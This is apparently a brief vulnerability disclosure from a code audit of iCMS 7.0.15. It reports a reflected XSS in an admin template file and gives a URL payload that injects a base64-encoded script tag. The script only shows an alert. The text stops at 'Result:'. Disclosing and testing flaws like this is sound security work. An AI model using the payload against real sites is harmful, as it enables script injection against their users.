'iCMS-7.0.15-Code-Audit'

GitHub上的一个CMS

1. Reflected XSS

In iCMS-7.0.15/app/admincp/template/admincp.access.php Line 32

$keywords is printed directly

Payload:

iCMS-7.0.15/app/admincp/template/admincp.access.php?keywords=\"><object+data=data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==></object>

Result: